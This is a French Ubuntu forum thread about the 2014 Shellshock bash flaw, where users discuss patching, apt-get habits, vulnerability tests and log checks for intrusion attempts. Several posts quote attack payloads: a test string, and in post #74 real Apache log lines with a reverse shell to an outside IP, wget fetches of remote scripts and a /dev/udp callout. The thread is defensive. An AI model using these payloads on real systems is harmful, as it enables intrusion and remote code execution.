Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

#51 Le 25/09/2014, à 22:38

melixgaro

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

j'imagine :
1/ pour attirer l'attention sur une faille/un risque plus grand qu'à l’accoutumée
2/ pour en remettre une couche sur les risques de garder des versions pour lesquelles il n'y a plus de màj
3/ pour inciter les gens à faire rapidement une màj (pour ceux qui ont tendance à remettre au lendemain)
...


Linux depuis ~2007. Xubuntu seulement.

Hors ligne

#52 Le 25/09/2014, à 22:48

jibel

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

melixgaro a écrit :

j'imagine :
1/ pour attirer l'attention sur une faille/un risque plus grand qu'à l’accoutumée
2/ pour en remettre une couche sur les risques de garder des versions pour lesquelles il n'y a plus de màj
3/ pour inciter les gens à faire rapidement une màj (pour ceux qui ont tendance à remettre au lendemain)
...

Ce qui veut dire, a t'entendre que mes OSs antérieurs a la 14.04 devraient passer a la trappe? Si j'ai bien compris?
12.04 LTS pas celle la quand même? 13.04;13.10 zou....dehors circuler y-a rien a voir  big_smile


Plus grande est la face, plus grand est le dos!
Toutes les fautes de frappe, d'orthographe, de grammaire et de syntaxe ci-dessus, sont la propriété intellectuelle de l'auteur. Elles doivent être reproduites et même corrigées sans l'accord préalable du susdit et toc !

Mint 17.1,Voyager20.04,Emmabuntus 1.Buster, Debian 10.buster, Hybryde 14.04, Pas d'OS intermédiaire ! PC Medion AKOYA  DD 1T + 2 .

Hors ligne

#53 Le 25/09/2014, à 22:50

melixgaro

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

à jibel,

c'est ce qui est écrit dans le premier message : 10.04 (serveur), 12.04, 14.04 et 14.10. Le reste a priori, non.


Linux depuis ~2007. Xubuntu seulement.

Hors ligne

#54 Le 25/09/2014, à 23:02

david96

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Normalement, ce message n'a pas lieu d'être, il fait déjà parti des mises à jours de sécurité (sources.list), que chaque membre doit normalement faire au minimum une fois par semaine (sudo apt-get update && sudo apt-get upgrade)

melixgaro a écrit :

j'imagine :
1/ pour attirer l'attention sur une faille/un risque plus grand qu'à l’accoutumée
2/ pour en remettre une couche sur les risques de garder des versions pour lesquelles il n'y a plus de màj
3/ pour inciter les gens à faire rapidement une màj (pour ceux qui ont tendance à remettre au lendemain)
...

Oui, possible, faudrait demander de suite à l'auteur du poste le pourquoi du comment ! tongue

Hors ligne

#55 Le 25/09/2014, à 23:02

jibel

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

melixgaro a écrit :

à jibel,

c'est ce qui est écrit dans le premier message : 10.04 (serveur), 12.04, 14.04 et 14.10. Le reste a priori, non.

OK merci, mais ne me concerne que pour la 13.04 Hybryde Fusion AIE , en plus je ne suis pas en réseau, faut quand même faire attention......


Plus grande est la face, plus grand est le dos!
Toutes les fautes de frappe, d'orthographe, de grammaire et de syntaxe ci-dessus, sont la propriété intellectuelle de l'auteur. Elles doivent être reproduites et même corrigées sans l'accord préalable du susdit et toc !

Mint 17.1,Voyager20.04,Emmabuntus 1.Buster, Debian 10.buster, Hybryde 14.04, Pas d'OS intermédiaire ! PC Medion AKOYA  DD 1T + 2 .

Hors ligne

#56 Le 25/09/2014, à 23:20

melixgaro

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

david96 a écrit :

Oui, possible, faudrait demander de suite à l'auteur du poste le pourquoi du comment ! tongue

oui, il n'y a que l'auteur qui puisse expliciter ses motivations. Quoi qu'il en soit, je trouve que c'est un événement suffisamment exceptionnel pour être signalé en gras + rouge + gros caractères.


Linux depuis ~2007. Xubuntu seulement.

Hors ligne

#57 Le 26/09/2014, à 00:00

Pseudo supprimé

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

10.04 OK , 12.04 OK, 14.04 OK

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: avertissement :x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
this is a test

#58 Le 26/09/2014, à 00:47

david96

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

http://upload.wikimedia.org/wikipedia/fr/timeline/bc87e46d3afe41b56082e0facfb9765d.png

Versions supportées :
http://fr.wikipedia.org/wiki/Liste_des_ … long_terme

Dernière modification par david96 (Le 26/09/2014, à 00:50)

Hors ligne

#59 Le 26/09/2014, à 08:08

CM63

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Bonjour,

alca94 a écrit :

ceux qui font les màj régulièrement ne seront pas au courant, mais auront un système patché malgré tout, non ?

alors pourquoi avoir créer une alerte et pas simplement envoyer des mises a jour a tout le monde

Parce que les distributions Linux "n'envoient" jamais rien (contrairement à W$) c'est à toi d'aller chercher les updates.
Moi je n'avais pas capté qu'il fallait faire régulièrement des $ apt-get update ;; apt-get upgrade , je croyais que cela se faisait tout seul. Donc pour moi l'alarme en rouge n'a pas été inutile, ou plutôt les échanges de posts qui ont suivi wink

A plus

Dernière modification par CM63 (Le 26/09/2014, à 08:09)


Quoi? Quelque chose que je ne connais pas et qui me fait l'affront d'exister?!

Hors ligne

#60 Le 26/09/2014, à 08:13

bruno

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Ceux qui ont fait les mises à jour hier peuvent recommencer ce matin puisque le nouveau patch est arrivé dans les paquets bash de Debian et Ubuntu.

Changelog Ubuntu :

SECURITY UPDATE: incomplete fix for CVE-2014-6271
    - debian/patches/CVE-2014-7169.diff: fix logic in bash/parse.y.
    - CVE-2014-7169


@CM23 : il y a moyen d'automatiser les mises à jours sur une distribution GNU/Linux, ou au moins d'être notifié lorsque des mises à jour sont publiés dans les dépôts.

Dernière modification par bruno (Le 26/09/2014, à 08:15)

Hors ligne

#61 Le 26/09/2014, à 08:23

CM63

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Oui, tu a raison, j'avais bien la notification pour l'upgrade, mais en revanche c'est à moi de le faire à la main. Et d'autre part, là je vois que la notification me dis que je suis à jour alors que je suis une release majeur en retard (Mint Petra 16 au lieu de Mint Qiana 17)

A plus

Dernière modification par CM63 (Le 26/09/2014, à 08:24)


Quoi? Quelque chose que je ne connais pas et qui me fait l'affront d'exister?!

Hors ligne

#62 Le 26/09/2014, à 08:54

nesthib

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Il y a eu deux mises à jours de sécurité depuis la première. Le paquet à jour est le 4.3-7ubuntu1.3 (ou 4.2-2ubuntu2.3 pour la 12.04 LTS).

apt-cache policy bash
bash:
  Installé : 4.3-7ubuntu1.3
  Candidat : 4.3-7ubuntu1.3

@bruno : tu peux utiliser cron-apt, mais ça n'est pas recommandé si tu ne sais pas ce que tu fais (c'est un outil destiné aux administrateurs qui ont un parc machine et qui gèrent leur propres dépôts).


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#63 Le 26/09/2014, à 08:57

grandtoubab

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Salut
Des explications compréhensibles
http://www.20minutes.fr/high-tech/14498 … heartbleed


Linux tout seul sur HP Pavilion DV7 et Acer Aspire T650, Canon MG3650 en wifi
Debian 11 Bullseye Gnome/Xorg, Gnome/Wayland avec SDDM
https://bidouilledebian.wordpress.com/
ON M'A VU DANS LE VERCORS, SAUTER A L'ELASTIQUE..... J'AI DANS LES BOTTES DES MONTAGNES DE QUESTIONS....

Hors ligne

#64 Le 26/09/2014, à 09:08

bruno

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

@nesthib : on est d'accord les mises à jour automatiques c'est possible mais risqué. De même je déconseille fortement d'utiliser ce type de commande que j'ai vu récemment sur le forum :

apt-get update && apt-get upgrade -y

L’intérêt est surtout d'être notifié automatiquement dès qu'une mise à jour est disponible, soit par l’intermédiaire de update-notifier, soit avec des outils comme apticron.

Hors ligne

#65 Le 26/09/2014, à 09:13

nesthib

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

La commande ci-dessus n'est absolument pas recommandée. Surtout lancée manuellement. Il vaut toujours mieux vérifier et valider manuellement.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#66 Le 26/09/2014, à 09:15

PPdM

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

bruno a écrit :

@nesthib : on est d'accord les mises à jour automatiques c'est possible mais risqué. De même je déconseille fortement d'utiliser ce type de commande que j'ai vu récemment sur le forum :

apt-get update && apt-get upgrade -y

L’intérêt est surtout d'être notifié automatiquement dès qu'une mise à jour est disponible, soit par l’intermédiaire de update-notifier, soit avec des outils comme apticron.

Et pourquoi donc ?


La critique est facile, mais l'art est difficile !
L'humanité étant ce qu'elle est, la liberté ne sera jamais un acquit, mais toujours un droit à défendre !
Pour résoudre un problème commence par poser les bonnes questions, la bonne solution en découlera

Hors ligne

#67 Le 26/09/2014, à 09:23

nesthib

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

@PPdM : j'allais t'envoyer un mail, j'ai édité ton message. L'option « -y » ne laisse pas de chance à l'utilisateur de valider la mise à jour ou de l'annuler s'il se rend compte qu'il ne veut pas l'effectuer. Par exemple si la mise à jour force la prise en compte d'autres paquets que l'on voudrait garder en l'état.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#68 Le 26/09/2014, à 09:24

bruno

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

nesthib a répondu au-dessus ("66) wink

L'option -y signifie que les mises à jour et les éventuelles solutions de résolution de dépendances/conflits de paquets seront acceptés automatiquement. Le jour où tu auras un conflit qui provoque la désinstallation de certains paquets essentiels pour toi tu comprendra ta douleur…
Il faut toujours examiner attentivement les mises à jour proposées et surtout ce qu'apt-get (ou aptitude) propose lorsqu'il y a un souci de dépendance ou de conflit.

Dernière modification par bruno (Le 26/09/2014, à 09:24)

Hors ligne

#69 Le 26/09/2014, à 09:26

nesthib

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

À la limite tu peux faire :

sudo apt-get update ; sudo apt-get upgrade --only-upgrade bash         -y

Mais de toute façon, comme c'est une commande ponctuelle, autant prendre la peine de lire et valider manuellement, donc sans l'option « -y ».


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#70 Le 26/09/2014, à 09:30

shamancid

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Bonjour,

j'essaie de comprendre la faille de sécurité car perso si je lance la commande suivante

env X="() { :;} ; echo shellshock" bash -c "sudo su"

je n'ai pas une élévation de privilège, il me demande bien un mot de passe. Quelqu'un aurait une commande pour me montrer que la faille marche vraiment, car j'ai plus l'impression que c'est du blabla de journaliste

Merci à vous

Hors ligne

#71 Le 26/09/2014, à 09:38

nesthib

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Pour ceux qui ont une machine serveur, vous pouvez tester les tentatives d'intrusion via votre serveur web en lançant :

grep -r '() \+{' /var/log/{apache2,nginx}/

Si vous avez des lignes de la forme :

x.x.x.x - - [25/Sep/2014:19:15:27 +0200] "GET / HTTP/1.1" 200 10388 "-" "() { :;}; UNE COMMANDE SHELL"

alors la section « UNE COMMANDE SHELL » a potentiellement été exécutée sur votre machine si elle n'était pas à jour.
NB. la commande ci-dessus ne détectera pas forcément toutes les tentatives.

De même, si vous avez un serveur ssh, il est conseillé de vérifier les dernières connexions :

grep 'sshd.*Accepted' /var/log/auth.log

et de vérifier que rien n'est anormal.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#72 Le 26/09/2014, à 09:42

abelthorne

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Je comprends pas le message en page d'accueil pour la nouvelle mise à jour d'aujourd'hui : pourquoi le "--only-upgrade bash" ? Il ne faut pas mettre à jour le reste du système, seulement le paquet bash ? Il y a un conflit ou un problème de màj si on met tout à jour ?

Hors ligne

#73 Le 26/09/2014, à 09:49

nesthib

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

@shamancid : ton exemple n'est pas bon, il faudrait mettre la commande critique dans la définition de la variable, après la fonction, pas comme argument du shell. Quoi qu'il en soit, une élévation de privilège n'est pas triviale, ni possible dans n'importe quel cas. Imagine maintenant un dépôt git. Celui ci permet la connexion en ssh mais sans pouvoir lancer de commandes. Avec la faille tu peux lancer des commandes en tant que l'utilisateur git, tu peux ouvrir une connexion réseau et donner un accès shell. Idem pour les services web (www-data). Tu peux me croire ou non, mais un exploit root est faisable facilement, je ne posterai cependant pas le code sur le forum pour des raisons évidentes.

@abelthorne : parce que tout le monde ne veut pas forcément toutes les mises à jour. L'urgence est ici de corriger la faille de bash, pas de générer d'autres soucis.


GUL Bordeaux : GirollServices libres : TdCT.org
Hide in your shell, scripts & astuces :  applications dans un tunnelsmart wgettrouver des pdfinstall. auto de paquetssauvegarde auto♥ awk
  ⃛ɹǝsn xnuᴉꞁ uʍop-ǝpᴉsdn

Hors ligne

#74 Le 26/09/2014, à 09:50

bruno

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Tiens un petit extrait de logs Apache
Un gentil (cf. l'URL) :

209.126.230.72 - - [25/Sep/2014:01:26:31 +0200] "GET / HTTP/1.0" 301 537 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

Des moins gentils :

54.251.*.* - - [26/Sep/2014:07:26:39 +0200] "GET / HTTP/1.1" 301 518 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"

166.78.*.* - - [25/Sep/2014:17:18:15 +0200] "GET / HTTP/1.1" 301 553 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
93.103.*.* - - [26/Sep/2014:00:50:28 +0200] "GET / HTTP/1.1" 301 553 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://tatacom/'"
94.23.*.* - [26/Sep/2014:05:43:54 +0200] "GET / HTTP/1.0" 301 572 "-" "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
109.95.*.* - - [26/Sep/2014:06:11:12 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 605 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=tata.com -O /tmp/a.pl\""

etc.

Hors ligne

#75 Le 26/09/2014, à 09:53

shamancid

Re : Faille de sécurité dans bash (mis à jour 12/10/2014)

Merci pour ta réponse nesthib

Hors ligne